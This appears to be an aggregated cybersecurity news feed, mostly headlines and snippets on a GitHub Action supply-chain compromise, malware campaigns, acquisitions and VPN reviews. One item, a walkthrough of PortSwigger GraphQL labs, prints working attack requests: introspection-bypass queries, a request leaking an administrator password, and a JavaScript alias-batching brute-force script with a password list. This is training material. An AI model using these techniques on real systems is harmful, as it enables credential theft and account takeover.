to Apache Tomcat versions 11.0.3, 10.1.35, or 9.0.99, disable unnecessary features, monitor for suspicious activity, and apply security patches promptly. As Apache Tomcat is widely used, keeping systems updated is crucial to avoid remote code execution, information disclosure, and content corruption. 

by The Cyber Express

by ComputerWeekly

A security vulnerability (CVE-2025-30066) has been identified in a widely used third-party GitHub Action, tj-actions/changed files. This security flaw exposes sensitive information, including valid access keys, GitHub Personal Access Tokens (PATs), npm tokens, and private RSA keys. The vulnerability has been patched in version 46.0.1, and users are urged to update immediately to protect their repositories and workflows. What is tj-actions/changed-files? tj-actions/changed-files is a popular GitHub Action that helps users track file modifications in pull requests and commits. It identifies changed files relative to a target branch, multiple branches, or specific commits, making it an essential tool for developers automating CI/CD workflows. However, due to a recent supply chain compromise, attackers exploited a security weakness in this action, leading to potential information disclosure risks. The vulnerability was discovered by StepSecurity Harden-Runner and has since been addressed in the latest patch. How Was the Action Compromised? The compromise occurred between March 14 and March 15, 2025. Originally, versions v1 through v45.0.7 were safe, but a malicious actor modified these tags to point to commit 0e58ed8, which contained a harmful updateFeatures code. This modification allowed attackers to read action logs and potentially extract sensitive credentials. Upon discovery, GitHub and the maintainer of tj-actions/changed-files took swift action to remove the compromised commit from all tags and branches. The issue was patched in version 46.0.1, and users are strongly advised to update immediately to prevent further exploitation. CISA Flags CVE-2025-30066 The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-30066 to its Known Exploited Vulnerabilities Catalog, emphasizing the severity of this issue. CISA strongly urges organizations to follow recommended mitigation steps to enhance security when using third-party GitHub Actions. Steps to Mitigate the Risk Users who have used tj-actions/changed-files in their workflows between March 14 and March 15 should take the following steps: 1. Review Workflows for Suspicious Activity: Examine executed workflows during the affected period. Look for unexpected output in the changed files section. If anomalies are detected, decode them using: echo ''xxx'' | base64 -d | base64 -d If the output contains sensitive credentials, immediately revoke and rotate those secrets. 2. Update to the Latest Version: If your workflows reference this action by SHA, update them immediately to avoid using the compromised commit. If using tagged versions (e.g., v35, v44.5.1), no action is required, as these tags have been updated to safe versions. The latest patched version is v46.0.1. 3. Rotate Any Potentially Exposed Secrets: As an added precaution, even if no suspicious activity is found, rotate secrets to ensure continued security. 4. Enhance Security Measures for Third-Party Actions: Regularly monitor security advisories for GitHub Actions. Consider implementing GitHub’s security features, such as Dependabot alerts and workflow permissions restrictions. Restrict third-party actions to trusted sources only. The compromise of tj-actions/changed-files is a significant example of supply chain attacks targeting the open-source community. Since many developers and organizations rely on third-party GitHub Actions to automate processes, a single compromised dependency can have widespread consequences. Key Risks Posed by CVE-2025-30066 Exposure of Sensitive Credentials: Attackers could extract GitHub PATs, npm tokens, RSA private keys, and other credentials from compromised workflows. Potential for Unauthorized Access: Stolen credentials could be used to manipulate repositories, inject malicious code, or gain unauthorized access to systems. Wide-Scale Impact: Given the popularity of this action, organizations across different industries may be affected. Lessons From the Attack The tj-actions/changed-files incident serves as a wake-up call for organizations relying on third-party dependencies. To minimize risks, cybersecurity experts recommend: Regularly Audit Dependencies: Periodically review and update third-party actions and dependencies to reduce exposure to vulnerabilities. Enable GitHub’s Security Features: Features like Dependency Graph, Dependabot Alerts, and Secret Scanning can help detect security issues early. Restrict Workflow Permissions: Avoid giving excessive permissions to third-party actions. Use the principle of least privilege (PoLP). Implement Zero-Trust Principles: Treat every third-party tool with caution and verify its integrity before integrating it into workflows. Monitor Security Advisories: Subscribe to GitHub security advisories and CISA alerts to stay updated on potential threats. Conclusion The compromise of tj-actions/changed-files (CVE-2025-30066) is a critical security issue that underline the growing risks of supply chain attacks in software development. With GitHub Actions being widely used to automate processes, organizations must prioritize security by regularly updating dependencies, restricting permissions, and monitoring for vulnerabilities. By following CISA’s recommendations and implementing proactive security measures, developers and organizations can mitigate the risk of similar attacks in the future.

by The Cyber Express

Introduction Security practitioners need to specialize in protecting GraphQL because its powerful interface serves as a primary target for attackers. Users will find practical explanations of four laboratories at PortSwigger’s Web Security Academy which demonstrate how attackers exploit GraphQL through unauthorized data accessibility along with accidental field disclosure of hidden endpoints and brute force protection workarounds. The labs contain reconnaissance and exploitation followed by remediation sections that mirror authentic penetration testing approaches utilized in the field. All developers and bug bounty hunters will benefit from learning these techniques since they improve both exploitation skills and GraphQL API security abilities. Now we can go all days and weeks discussing about how graphql works and some vulnerabilities, but the best way to understand something is to do them hands on. For this we will be solving some portswigger labs. And make sure before solving labs, you have installed ==inQL== plugin in your burpsuite. Yes it can be installed on community edition as well. Lab 1: Accessing private GraphQL posts Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts App Exploration: First we see at at the page refresh, i.e each time page loads we see an POST request made. And each time we click view post we see another POST request is made. Now carefully look at the screenshot attached above. The first POST request that loads on each page refresh does not include variablesand might not be vulnerable when tested. We tried testing but nothing of much help was returned. Now in the second POST request the one marked with GREEN COLOUR, might be interesting as it includes an id parameter in it’s request. Graphql Introspection Query First we try and perform graphql introspection query. To do this manually you can refer to this medium article. Now we find the POST request made to /graphql/v1 endpoint, and let’s change the body of the POST query to the following. GraphQL Introspection Query: The GraphQL schema structure with its types along with fields directives and operations can be obtained through an introspection query. The metadata exposure relies on reserved __schema and __Type fields in this system. Now in our case the introspection query looks something like the following. {""query"": ""query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}""} Let’s quickly run through some of the important keywords in this graphql query. Root Operations: Fetches names of root types (queryType, mutationType, subscriptionType). Types: Retrieves all schema types via types using the FullType fragment. Fields: Includes deprecated fields, their arguments (InputValue fragment), return types (TypeRef fragment), and deprecation details. Inputs/Enums: Lists input fields, enum values (including deprecated ones), and possible union/interface types. Directives: Lists schema directives, their locations, and arguments. TypeRef Fragment: Unwraps nested types (e.g., NonNull(List(String))) via recursive ofType traversal. InputValue Fragment: Describes input arguments (name, type, default value). In the response, you will get all valid queries that we can use in graphql. This will be extremely useful in crafting graphql queries. Now let’s search for interesting parameters like emails and passwords. For emails we get 0 matches. But when we search for passwords we do find an query called postPassword. Getting password through graphql Now let’s go back to our repeater, this time in request tab you should see Graphql. Go to this section and add postPassword on the last line and let’s see our responses. We get our postPassword response as null. Hmm, that sounds interesting, what if we change variable values? On changing the id to 3 let’s see if we can get something interesting. For us this time we go get our password !!!. Alternate ways to identify graphql queries from graphql introspection using json. Now if you don’t want to search and traverse through all the queries from graphql introspection query, then you can simply copy the response header, only the json part. Save it to an text file, and load the text file with your graphql endpoint URL. If you are using inQL plugin then you should be able to scan for graphql queries. As you can see in the diagram bellow we do get our query which is nothing but postPassword Lab 2: Accidental exposure of private GraphQL fields Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure App Exploration: Now while exploring the lab, we see our login request is handled by graphql query. We also do see that upon login we can change password of our user, that input and request also get’s passed through graphql but, for now let’s tamper and play with login request and see if we can get any other user’s credentials. Graphql Introspection Query. The GraphQL schema structure with its types along with fields directives and operations can be obtained through an introspection query. The metadata exposure relies on reserved __schema and __Type fields in this system Now send the login request to Repeater using ctrl+R. Right click and on top you should see graphql, and when you place your mouse on that, you should see Set Introspection Query. And you should send the request to the server and observe the response from the server. Now, from the request, copy the json data, and save it to a text file. And go to inQL scanner, copy the endpoint, and enter this json data as input. You should see valid queries that we can use in graphql. Now you can go ahead and try tampering with this parameters, but we end up getting nothing. Now we can try something else. Here is step by step guide on what we can do. Step 1: Send introspection query, and watch for response. You can do this with right click and selecting ==Graphql > Set Introspection Query== Step 2: Now once you have sent the request, right click it, select ==Graphql > Save GraphQL queries to site map== Step 3: Now go to Target, view your sitemap for your website and then we see 5 POST request are made. The first yellow one makes getBlogPost and the second orange request performs graphql query to getAllBlogPost, which does little help to us. But the third request has something valuable, it gets user, send it to repeater and see what happens. By default, our POST request has JSON data like something like the following. We see that the id parameter has been set to 0. {""query"":""query($id: Int!) {\n getUser(id: $id) {\n id\n username\n password\n }\n}"",""variables"":{""id"":0}} Now when we see that we don’t get anything interesting in the response. HTTP/2 200 OK Content-Type: application/json; charset=utf-8 Set-Cookie: session=jZ2FQLiRy2iGKohvMlC1JLmszDYs0PfW; Secure; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 39 { ""data"": { ""getUser"": null } } Tampering the id value. Now, what if we change the ID to something like 1. Let’s see what happens. Our request looks like something like following. POST /graphql/v1 HTTP/2 Host: 0a6100d104bed431a027157e005d0023.web-security-academy.net Cookie: session=2Jghu6Q0onW8xIcMyCgZoQvmVMd9vBzB Sec-Ch-Ua-Platform: ""Linux"" Accept-Language: en-GB,en;q=0.9 Accept: application/json Sec-Ch-Ua: ""Not?A_Brand"";v=""99"", ""Chromium"";v=""130"" Content-Type: application/json; charset=utf-8 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Origin: https://0a6100d104bed431a027157e005d0023.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a6100d104bed431a027157e005d0023.web-security-academy.net/login Accept-Encoding: gzip, deflate, br Priority: u=1, i Content-Length: 117 {""query"":""query($id: Int!) {\n getUser(id: $id) {\n id\n username\n password\n }\n}"",""variables"":{""id"":1}} Now we get the password for administrator. HTTP/2 200 OK Content-Type: application/json; charset=utf-8 Set-Cookie: session=PzxIBAiGmDkkkSU4l9PZNHdH2NPsE32B; Secure; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 133 { ""data"": { ""getUser"": { ""id"": 1, ""username"": ""administrator"", ""password"": ""udggyox0zi3qtil5gqhl"" } } } Now we login with these credentials and we delete the carlos user. You can also try changing the id parameter to 2, 3 and so on to see other user’s credentials. With this we solve the lab. Lab 3: Finding a hidden GraphQL endpoint Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint Discovering the endpoint. To discover endpoints we need first come up with a word list that contains names of some endpoints that exist in the graphql. Portswigger already made an solution for this task. You can refer to this URL. Now our wordlist should look something like the following: /graphql /api /api/graphql /graphql/api /graphql/graphql /graphql/v1 Now let’s start fuzzing for interesting endpoints. Note that unlike the rest of endpoints the /api does not return 404 but returns with 400./ Note that while fuzzing don’t URL encode the characters. Now let’s take detailed look on the request. Crafting graphql query for our endpoint. The error tells us that we don’t have an valid query for this endpoint. Let’s have an look a portswigger documentation. You can refer this link. According to the BURPSUITE documentations when we try both of the attempts, the second attempt works. Here is how it looks inside BURPSUITE. Below we are trying to set introspection query with newline and it fails. This is our first attempt as per portswigger docs. Now as per the portswigger docs, let’s try sending the GET request which translates to something like the following : GET /api?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D Notice that we are sending the graphql parameters with new line character which is %0A. Note that the URL decode of the above query would look something like below. query{__schema {queryType{name}}} This new line character is helpful in bypassing graphql instrospection defenses. It helps to send introspection queries when developers have restricted them. As you can see our second attempt works when we try including an query in newline. Now if we try to inject grapql introspection query within this request we get error. But what if we can inject in graphql parameters instead of normal http GET request? Bypassing graphql introspection defences with newline Let’s switch to GRAPHQL query and see if we can manually send introspection. In request section just switch from Pretty to Graphql and we just switch { to new line and we bypass the error and restriction. Now we are able to perform introspection query !! As we have solved in previous labs, let’s quickly save the request to an json file, and send it to inQL scanner or you can save graphql queries to sitemap once you are able to send introspection queries. Deleting carlos user Now you might be probably wondering both of the methods get you the same results right? Yes, but if you use the method in which first you send the introspection query and then if you save the graphql queries to your sitemap, then it probably saves you some time, it’s a bit quick and less messy. Now we found two queries. One deletes the user and another one finds the user. Both of the graphql query might look something like below. mutation { deleteOrganizationUser(input: DeleteOrganizationUserInput) { user { id username } } } query { getUser(id: Int!) { id username } } Now let’s add these to sitemap, and in sitemap you need to go to /api to make sure to see the endpoints. Note that the one highlighted with red deletes user, and with green let’s us know the users through id. Now let’s quickly add both requests to repeater and tweak our the id parameters from the getUser graphql query. Let’s find out the id of users. Now the id variable with value 3 results in user named carlos. Let’s make quick note of it and then use our deleteOrganizationUser graphql query to delete this user. With this we solve our lab !! Lab 4: Bypassing GraphQL brute force protections Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-brute-force-protection-bypass Now this lab is fairly simple. If you try and bruteforce your way in, you will get to notice the rate limiting feature applied in the web application. Now let’s quickly paste this text in our browser console so that we can simulate bruteforce attack. Performing bruteforce attack with simple js script. copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split('','').map((element,index)=>` bruteforce$index:login(input:{password: ""$password"", username: ""carlos""}) { token success } `.replaceAll(''$index'',index).replaceAll(''$password'',element)).join(''\n''));console.log(""The query has been copied to your clipboard.""); Once you have pasted the text you would notice that the bruteforce attack has started. Packing our bruteforce attack into an single graphql query Since we already got an valid user credentials, let’s take an look at how the request gonna look inside burp suite. We notice graphql section. In this let’s paste our bruteforce text from the browser console and look at the response. Finding password for carlos user We do get our response, and for us the bruteforce8 returns true, which is 1234567, so let’s try logging in to the carlos user with 1234567 as password. And we do solve our lab. Now with this simple steps we might solve the lab, but we did not understand why we were able to bypass the rate limits. For this let’s deep dive on this lab and what we have done. Understanding rate limit bypasses in graphql GraphQL’s built-in rate limiting can be an security issue when it only checks the number of HTTP requests rather than the individual operations performed inside an single request Instead of spamming separate login requests that would normally trigger the rate limit, you can send multiple login attempts into one heavy GraphQL query using query aliasing. Here’s the brutal core of the hack: you build one massive query that includes many login operations, each with its own alias (like bruteforce0, bruteforce1, etc.). Each alias carries a different password from your list. The server ends up processing every attempt in a single HTTP request, completely sidestepping the rate limiter that only watches the number of requests, not the number of operations. ==In nutshell we are packing up our bruteforce attack of all passwords combinations into an single graphql query using aliasing==. A quick snippet in the browser console automates this: copy(`123456,password,...`.split('','').map((element,index)=> ` bruteforce$index:login(input:{password: ""$password"", username: ""carlos""}) { token success } ` .replaceAll(''$index'',index) .replaceAll(''$password'',element)) .join(''\n'')); This script converts a list of passwords into a batch of login attempts. When executed, it reveals which alias, say bruteforce8, returns success—proving that one of the passwords, like 1234567, is valid. Conclusion The attack capabilities of GraphQL become evident through practical demonstrations which show both private post scraping through introspection introspection and query aliasing for breaking rate limits. The key takeaway? Never assume obscurity equals security. Enable audio-directory limitations in live environments and review API components beyond introspection and check for unintended field access points and deploy operation rate regulations. Both InQL and Burp’s GraphQL parser serve defenders by revealing possible leaks. Attackers discover through these labs that even protected APIs maintain vulnerabilities which become accessible to view. Ready to test your skills? You should use Burp Suite now to perform ethical GraphQL penetration tests.

by HACKLIDO

by ComputerWeekly

Digital trust is the foundation of secure online interactions, ensuring confidence in transactions, communications, and data protection. For global enterprises, maintaining trust is increasingly challenging due to evolving cybersecurity threats and regulatory complexities. Automated Certificate Lifecycle Management (CLM) enhances security by streamlining SSL/TLS certificate issuance, renewal, and management across distributed environments. CLM strengthens encryption, authentication, and compliance, reducing downtime and mitigating security risks. Learn how automated CLM solutions help global enterprises maintain digital trust at scale.

by Sectigo

Singapore’s armed forces officially launched two new commands on March 18, 2025, to safeguard the country’s critical digital infrastructure. The Defence Cyber Command (DCCOM) and the SAF C4 and Digitalisation Command (SAFC4DC) will operate under the Digital and Intelligence Service (DIS), Singapore’s fourth military service. Speaking at the inauguration ceremony of DCCOM and SAFC4DC at Hillview Camp, Singapore’s Defence Minister Dr. Ng Eng Hen stressed on the importance of the new commands in countering the rising frequency and complexity of cyber threats. He noted that digital vulnerabilities are growing exponentially, making it imperative for the Singapore Armed Forces (SAF) to step up its cyber defenses. “The SAF must rise to the challenge of protecting our digital backbone and critical IT infrastructures,” Dr. Ng stated. “We have seen an alarming increase in cyber threats—threat actors now employ advanced techniques, including artificial intelligence, zero-day exploits, and ransomware, targeting vital sectors like healthcare, energy, and government services.” DCCOM and SAFC4DC: Boosting Cyber Defense and Digital Innovation Establishing DCCOM and SAFC4DC is a proactive measure to fortify Singapore’s digital defenses. The Defence Cyber Command will focus on defending the country’s critical military networks, ensuring cybersecurity resilience in the face of evolving cyber threats. Meanwhile, the SAFC4DC will drive the SAF’s digital transformation efforts by leveraging innovative technologies, including cloud computing, 5G, and AI-driven solutions. Dr. Ng emphasized the need for SAF to integrate these digital technologies effectively. “The DIS’ role is to guide the SAF in applying the right tools for the right task. We must harness digital advancements to enhance operational efficiency and security,” he said. Collaboration with the Public and Private Sectors Beyond military applications, the newly launched commands will collaborate closely with other government agencies and the private sector. Dr. Ng highlighted the importance of industry partnerships in keeping pace with the growing IT landscape. “The IT cycle moves rapidly, and we must gain access to cutting-edge solutions and operational insights,” he remarked. “Partnering with the private sector will enable the SAF to stay ahead of cybersecurity threats and enhance digital resilience nationwide.” Singapore’s cyber defense strategy also involves tapping into the expertise of Operationally Ready National Servicemen (NSmen). Dr. Ng encouraged NSmen to contribute their knowledge and skills through advisory and technical roles within the DIS. “As cyber threats grow, more NSmen are stepping forward to build our digital defense. Their expertise is invaluable in safeguarding our national security,” he said. Recognition of Personnel and Future Commitments During the inauguration, Dr. Ng commended the personnel of DCCOM and SAFC4DC, acknowledging their crucial role in Singapore’s cyber defense strategy. He urged them to uphold their responsibilities with professionalism and dedication. “Today’s inauguration of the SAFC4DC and DCCOM is a positive and important step for the DIS and SAF,” he said. “Singaporeans have placed a heavy responsibility on you—fulfill your mission with unwavering commitment.” To mark the occasion, Dr. Ng unveiled the official logos of both commands and engaged with personnel to discuss their roles in strengthening Singapore’s cybersecurity capabilities. A Strategic Step Towards Cyber Resilience The latest findings from the Cyber Security Agency of Singapore (CSA) highlight a concerning reality—many organizations still underestimate the severity of cyber threats. A staggering 59% of businesses and 56% of non-profits cite a lack of cybersecurity knowledge and experience as their biggest barrier to adopting proper defenses. This knowledge gap is a glaring issue, especially when cybercriminals are constantly refining their attack strategies with AI-powered exploits, zero-day vulnerabilities, and ransomware. The second most common reason for inaction is the mistaken belief that ""it won’t happen to us""—a mindset held by 46% of businesses and 49% of non-profits. This overconfidence is dangerous, as recent cyberattacks on healthcare, financial institutions, and government agencies have proven that no sector is immune. Other major roadblocks include limited manpower and resources (39% for businesses, 37% for non-profits), low return on investment (36% for businesses, 31% for non-profits), and budget constraints (31% for businesses, 27% for non-profits). These statistics paint a clear picture: while cybersecurity awareness is growing, tangible action is still lagging behind. As David Koh, Chief Executive of CSA, rightly pointed out, waiting for an attack to happen before investing in cybersecurity is a costly and risky gamble. The economic potential of the cybersecurity industry tells another story—one of immense growth and opportunity. By 2029, the cybersecurity market in Singapore is projected to reach a staggering US$773.23 million, growing at a CAGR of 7.72%. In 2025 alone, companies are expected to spend an average of US$154.21 per employee on cybersecurity measures. With the United States forecasted to lead the global cybersecurity market with revenues reaching US$88.2 billion, Singapore is emerging as a key player, attracting top-tier talent and investments in cutting-edge cybersecurity innovations. Against this backdrop, the launch of DCCOM and the SAF C4 & Digitalisation Command (SAFC4DC) is a game-changer for Singapore’s national defense. These new commands signify more than just an administrative restructuring—they represent a proactive and strategic approach to securing the nation’s digital infrastructure. The Singapore Armed Forces (SAF) is no longer just defending land, air, and sea; cyber is now a battlefield of its own. With cyberattacks becoming more refined, frequent, and destructive, Singapore’s decision to integrate AI-driven threat detection, cloud computing, and 5G technologies into its defense strategy is both timely and necessary. More importantly, the emphasis on public-private partnerships and leveraging Operationally Ready National Servicemen (NSmen) for cybersecurity expertise is a smart move. Given the rapid pace of technological change, working closely with industry leaders ensures that Singapore’s cyber defenses remain agile, resilient, and ahead of emerging threats. This move sets an important precedent: cybersecurity is no longer optional—it is a national priority. The creation of DCCOM and SAFC4DC is a clear message that Singapore is not waiting to be attacked; it is preparing to deter, defend, and dominate in cyberspace. This shift in mindset is what will separate nations that react to cyber threats from those that proactively neutralize them. By combining technological innovation, strong policy direction, and cross-sector collaboration, Singapore is taking a decisive and forward-thinking stance on cyber resilience. The establishment of these commands is not just about military preparedness—it is about safeguarding the nation’s digital future.

by The Cyber Express

Dimitris joined HTB as a Business Development Representative. His passion for B2B offerings and collaboration with product marketing led to his current role as a Product Marketing Specialist

by Hack The Box Blog

Effectively responding to cloud security incidents can be daunting for organizations expanding rapidly in the cloud. Whether you face a... The post Automating DevSecOps with Sysdig and PagerDuty appeared first on Sysdig.

by Sysdig

by CrowdStrike

by CrowdStrike

VeeVPN 1.6.1 - Unquoted Service Path

by Exploit DB

Gitea 1.24.0 - HTML Injection

by Exploit DB

TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)

by Exploit DB

Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)

by Exploit DB

Loaded Commerce 6.6 - Client-Side Template Injection(CSTI)

by Exploit DB

In the last few days, two compromised GitHub Actions are actively leaking credentials, and a large-scale OAuth phishing campaign is exploiting developer trust.

by Mitiga

Reddit users from trading and crypto subreddits are being lured into installing malware disguised as premium cracked software.

by Malwarebytes Labs

Cybersecurity researchers have disclosed details of a new supply chain attack vector dubbed Rules File Backdoor that affects artificial intelligence (AI)-powered code editors like GitHub Copilot and Cursor, causing them to inject malicious code. ""This technique enables hackers to silently compromise AI-generated code by injecting hidden malicious instructions into seemingly innocent

by The Hacker News

by Dark Reading

by Dark Reading

by Dark Reading

by Dark Reading

by Dark Reading

The all-cash deal offers a path for Google to better support cloud customers who have assets spread across public environments, including Azure and others.

by Dark Reading

An unpatched security flaw impacting Microsoft Windows has been exploited by 11 state-sponsored groups from China, Iran, North Korea, and Russia as part of data theft, espionage, and financially motivated campaigns that date back to 2017. The zero-day vulnerability, tracked by Trend Micro''s Zero Day Initiative (ZDI) as ZDI-CAN-25373, refers to an issue that allows bad actors to execute hidden

by The Hacker News

Google is making the biggest ever acquisition in its history by purchasing cloud security company Wiz in an all-cash deal worth $32 billion. ""This acquisition represents an investment by Google Cloud to accelerate two large and growing trends in the AI era: improved cloud security and the ability to use multiple clouds (multicloud),"" the tech giant said today. It added the acquisition, which is

by The Hacker News

The sneaky malware packs capabilities for system reconnaissance as well as credential and cryptocurrency theft.

by Dark Reading

Tuesday’s big news that Google is acquiring security startup Wiz for a record-breaking $32 billion comes with a very big qualifier. Google says it will position Wiz as a “multicloud” offering, meaning Wiz will not be a Google-only shop.  The reality is that Google had no choice but to do this, and a closer look […]

by TechCrunch

Anyone can become a zero-knowledge threat actor now, thanks to AI.

by ZDNET Security

A critical security vulnerability has been disclosed in AMI''s MegaRAC Baseboard Management Controller (BMC) software that could allow an attacker to bypass authentication and carry out post-exploitation actions. The vulnerability, tracked as CVE-2024-54085, carries a CVSS v4 score of 10.0, indicating maximum severity. ""A local or remote attacker can exploit the vulnerability by accessing the

by The Hacker News

While Okta provides robust native security features, configuration drift, identity sprawl, and misconfigurations can provide opportunities for attackers to find their way in. This article covers four key ways to proactively secure Okta as part of your identity security efforts. Okta serves as the cornerstone of identity governance and security for organizations worldwide. However, this

by The Hacker News

Cybercriminals are using automated AI bots to generate multiple login attempts across a range of services. And it''s about to get much worse.

by ZDNET Security

Cybersecurity researchers have warned about a large-scale ad fraud campaign that has leveraged hundreds of malicious apps published on the Google Play Store to serve full-screen ads and conduct phishing attacks. ""The apps display out-of-context ads and even try to persuade victims to give away credentials and credit card information in phishing attacks,"" Bitdefender said in a report shared with

by The Hacker News

Though the chat logs were leaked a month ago, analysts are now seeing that Russian officials may have assisted Black Basta members, according to the shared messages.

by Dark Reading

Though the group initially stuck to classic ransomware TTPs before demanding the ransom, it went off script when it began threatening the group and detailing potential consequences the victim would face.

by Dark Reading

by ComputerWeekly

The agency plans to keep workers on paid administrative leave despite ongoing concerns about its ability to address cyber threats.

by Cybersecurity Dive

Context Sekoia researchers have released updates on ClearFake, a malicious JavaScript framework that infects compromised websites to deliver malware through drive-by downloads and social engineering tactics. Initially observed in July 2023, ClearFake utilized fake browser update prompts to trick users into downloading malware. The latest 2025 variant introduces new lures, including fake reCAPTCHA and Cloudflare Turnstile verifications,...

by RH-ISAC

IPVanish is a popular VPN service renown for protecting online privacy, internet security, and reclaiming online freedom. This VPN offers unmatched high speeds, impeccable security, […]

by Privacy Affairs

NordVPN and ProtonVPN are both security and privacy-oriented VPN providers. They have a similar mission of making the internet better, free of surveillance, censorship, and threats. They also boast a proven track record of fighting internet injustices and helping their users reclaim their online freedom. In this review, we will make an in-depth comparison between NordVPN and ProtonVPN.

by Privacy Affairs

Hotstar is synonymous with the best Indian entertainment, including cricket, and is widely available in India as Disney+ Hotstar. If you live abroad and wish to catch up with Indian content, you can get a limited selection via the international version of Hotstar. This version is available in the US, UK, and Canada.

by Privacy Affairs

CyberGhost is a fast, secure, and reliable VPN service suitable for various online tasks such as torrenting, streaming, and private browsing. CyberGhost allows anyone to […]

by Privacy Affairs

Saudi Arabia has one of the worst internet injustices since it has tight control of internet freedom. Despite good internet access, the government practices digital authoritarianism.

by Privacy Affairs

In this guide, you will learn about the best VPNs for your Android smartphone, why you need a VPN on your Android, and you will also know the criteria we use to select the VPNs.

by Privacy Affairs

In this guide, I will explain why you need a VPN to watch La Liga, show you premium and free options for streaming La Liga […]

by Privacy Affairs

Torrenting is among the best ways to get content from Peer-to-Peer (P2P) services. Unlike other methods such as direct downloads, torrenting allows you to get content that’s not hosted in centralized servers.

by Privacy Affairs

A VPN increases the privacy of your online information as well as your digital security. It also enables you to access geo-blocked content, avoid digital tracking and use public WIFI more securely.

by Privacy Affairs

Windows is the most popular operating system for personal computers, commonly used for browsing the web, working from home, streaming online content, torrenting, and downloading […]

by Privacy Affairs

The open source Java 24 programming language adds more features to help developers with AI and security.

by ITPro Today

Federal court rules U.S. cybersecurity agency must re-hire over 100 former employees

by TechCrunch

Threat hunters have shed more light on a previously disclosed malware campaign undertaken by the China-aligned MirrorFace threat actor that targeted a diplomatic organization in the European Union with a backdoor known as ANEL. The attack, detected by ESET in late August 2024, singled out a Central European diplomatic institute with lures related to Word Expo, which is scheduled to kick off in

by The Hacker News

At least four different threat actors have been identified as involved in an updated version of a massive ad fraud and residential proxy scheme called BADBOX, painting a picture of an interconnected cybercrime ecosystem. This includes SalesTracker Group, MoYu Group, Lemon Group, and LongTV, according to new findings from the HUMAN Satori Threat Intelligence and Research team, published in

by The Hacker News

A server-side request forgery vulnerability in OpenAI''s chatbot infrastructure can allow attackers to direct users to malicious URLs, leading to a range of threat activity.

by Dark Reading

The data loss prevention company emerges from stealth with an AI-powered platform to help organizations distinguish between legitimate and risky activity.

by Dark Reading

By following these seven tips from federal authorities, you can prevent Medusa from wreaking havoc on your life and business.

by ZDNET Security

Introduction In this post, we’ll show precisely how to chain round-trip attacks and namespace confusion to achieve unauthenticated admin access on GitLab Enterprise by exploiting the ruby-saml library

by PortSwigger Research

Technology has transformed so many areas of our lives and relatively quickly in the grand scheme of things. From tech used to make education more accessible, for example, to the ever talked about artificial intelligence (AI) shaping many sectors, the way tech has integrated with the modern world both seamlessly and speedily is notable.  One […] The post Tech Show London: Making Dating Scams Less Attractive appeared first on IT Security Guru.

by IT Security Guru

My two previous recent postings on AI covered “Agentic AI” and how that impacts cybersecurity and the eventual emergence of malicious agentic AI malware.

by KnowBe4

Our recent research reveals a concerning discrepancy between employees'' confidence in their ability to identify social engineering attempts and their actual vulnerability to these attacks.

by KnowBe4

For candidates with a cybersecurity background who want to stay competitive, now is the time to invest in obtaining AI skills.

by Dark Reading

Get details on this recent supply chain attack and how to prevent similar attacks in the future.

by Legit Security

Google has rolled out an update to resolve the issue, but if you factory reset your device, you need to take an additional step.

by ZDNET Security

Want to keep your personal info safe? Use this tool from ExpressVPN to see how much of it is out there.

by ZDNET Security

ReliaQuest sponsors the PGA TOUR’s Valspar Championship youth golf clinic, in partnership with youth golf program First Tee of Tampa Bay.

by ReliaQuest

Microsoft is calling attention to a novel remote access trojan (RAT) named StilachiRAT that it said employs advanced techniques to sidestep detection and persist within target environments with an ultimate aim to steal sensitive data. The malware contains capabilities to ""steal information from the target system, such as credentials stored in the browser, digital wallet information, data stored

by The Hacker News

Amazon informed Echo users in the US that the ""Do not send voice recordings"" feature will stop working on March 28, 2025.

by Malwarebytes Labs

Google is making the biggest acquisition in its history. The company’s parent company Alphabet is buying Wiz, the cloud security startup, for $32 billion in an all-cash transaction. The deal has now been confirmed. A source described the transaction as a $33 billion deal previously. That includes the $1 billion that Google is paying out […]

by TechCrunch

Cybersecurity has a wellbeing problem. One that we, at The IT Security Guru, won’t stop shouting about. We’ve all seen the stats: burnout runs rife throughout cybersecurity, there’s a retention issue, and a sizable skills gap.  This, on top of the fact that threats are becoming more frequent in volume and more complex in make-up, […] The post Wellbeing in the Cybersecurity Sector: A Call for Participation appeared first on IT Security Guru.

by IT Security Guru

